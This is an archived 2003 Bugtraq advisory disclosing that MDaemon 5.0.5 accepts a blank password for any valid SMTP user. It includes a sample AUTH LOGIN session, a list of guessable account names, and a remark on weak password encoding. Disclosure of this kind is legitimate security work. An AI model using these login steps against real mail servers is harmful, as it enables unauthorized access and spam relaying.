lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 9 Aug 2003 01:59:59 +0200
From: "Buckaroo Banzai" <buckaner0@...ra.es>
To: bugtraq@...urityfocus.com
Subject: MDaemon 5.0.5 authentication vulnerability




Hello,

There is a security problem on MDaemon 5.0.5 (maybe other versions 
affected as well) regarding smtp authentication.


Blank password authenticates any valid user:

For primary domain:
User:		VALIDUSER	or	VALIDUSER@...maridomain.com
Password:	blank password

For secondary domains:
User:		VALIDUSER@...ondarydomain.com
Password:	blank password


Using this vulnerability Spammers could abuse server even if relay control is 
properly configured. To abuse the server there is no need to get the 
userlist.dat and decode the well known weak encryption of MDeamon 5.0.6 
and before (base64 encoded password plus one offset for each character 
(1byte)).


If a valid user is required you could always built-in account "MDaemon" and 
the default password (see references) or blank password. You could also try 
with well known accounts (administrator, webmaster, info, spam, admin, etc.)


Sample session:

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6               (334 Username:)
TURhZW1vbg==                      (MDaemon)
334 UGFzc3dvcmQ6               (334 Password:)
                                             (blank password)
235 Authentication successful



Buckaroo Banzai

PD: The bug has been submited to ALT-N


References: related security issues regarding MDaemon 5
-------------------------------------------------------
http://www.securityfocus.com/bid/4689
http://www.securityfocus.com/bid/4686
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0057.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ